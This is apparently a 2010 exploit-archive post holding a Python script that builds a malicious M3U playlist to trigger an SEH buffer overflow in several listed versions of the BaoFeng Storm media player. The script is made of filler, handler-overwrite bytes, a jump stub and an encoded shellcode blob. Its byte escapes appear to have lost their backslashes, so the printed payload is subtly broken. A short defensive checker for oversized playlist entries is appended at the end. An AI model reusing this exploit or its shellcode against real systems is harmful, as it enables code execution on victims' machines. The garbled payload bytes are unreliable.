
BaoFeng Storm M3U File Processing Buffer Overflow Exploit

Posted on 06 May 2010

```python
#!/usr/bin/env python
#################################################################
#
# Title: BaoFeng Storm M3U File Processing Buffer Overflow Exploit
# CNVD-ID: CNVD-2010-00752
# Download: www.baofeng.com
# Test: Put m3u file in root(e.g. c:/ d:/),and open this m3u file
# Platform: Windows XPSP3 Chinese Simplified
# Vulnerable: Storm2012 3.10.4.21
#             Storm2012 3.10.4.16
#             Storm2012 3.10.4.8
#             Storm2012 3.10.3.17
#             Storm2012 3.10.2.5
#             Storm2012 3.10.1.12
#################################################################
# Code :
file= "baofeng.m3u"          # name of the playlist file to create
junk ="x41"*795              # filler placed ahead of the handler record
nseh="x61xe8xe1"             # next-SEH field
seh="xaaxd7x40"              # SEH handler field
jmp ="x53x53x6dx58x6dx05x11x22x6dx2dx10x22x6dxacxe4"
nops ="x42" * 110            # padding between the jump stub and the payload
shellcode=("PPYAIAIAIAIAQATAXAZAPA3QADAZA"
"BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA"
"58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB"
"AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K"
"22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL"
"MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55"
"Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V"
"NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB"
"R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT"
"NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU"
"89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM"
"KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC"
"QQ2LRCM0LJA")
# Concatenate the pieces into one playlist entry and write it out
fobj=open(file,"w")
payload=junk+nseh+seh+jmp+nops+shellcode
fobj.write(payload)
fobj.close()
# Inj3ct0r.com [2010-05-06]
```
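
A defender-side check for the kind of file this script writes, as an added example that is not part of the original post: it flags playlist entries far longer than any real path or containing long single-byte runs. The thresholds, the `inspect_m3u` name and both sample playlists are assumptions constructed for illustration.

```python
import re
import sys

# Thresholds are assumptions for this sketch, not values from the advisory.
MAX_PATH_ENTRY = 260     # Windows MAX_PATH: ceiling for a local file entry
MAX_OTHER_ENTRY = 2048   # generous ceiling for URLs and #EXT directives
URL_RE = re.compile(rb"^[A-Za-z][A-Za-z0-9+.\-]*://")
RUN_RE = re.compile(rb"(.)\1{63,}", re.DOTALL)   # 64+ repeats of one byte


def inspect_m3u(data: bytes):
    """Return (line_number, finding) pairs for entries that look malformed."""
    findings = []
    for n, raw in enumerate(data.splitlines(), start=1):
        line = raw.strip()
        if not line:
            continue
        # Directives and URLs may legitimately be longer than a file path.
        relaxed = line.startswith(b"#") or URL_RE.match(line)
        limit = MAX_OTHER_ENTRY if relaxed else MAX_PATH_ENTRY
        if len(line) > limit:
            findings.append((n, "overlong-entry"))
        if RUN_RE.search(line):
            findings.append((n, "repeated-byte-run"))
        if any(b < 0x20 and b != 0x09 for b in line):
            findings.append((n, "control-bytes"))
    return findings


# Constructed samples: an ordinary playlist, and one with a single entry sized
# like the page's filler (795 + 110 bytes) but made of inert letters only.
BENIGN = (b"#EXTM3U\r\n#EXTINF:123,Artist - Title\r\n"
          b"C:\\Music\\track01.mp3\r\nhttp://example.com/stream.mp3\r\n")
OVERSIZED = b"#EXTM3U\n" + b"A" * 795 + b"B" * 110 + b"\n"

if __name__ == "__main__":
    # Usage: python inspect_m3u.py playlist1.m3u playlist2.m3u ...
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            for n, finding in inspect_m3u(fh.read()):
                print(f"{path}:{n}: {finding}")
```

A file written without any newline, as the script above does, is treated as one entry and is still checked.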

 
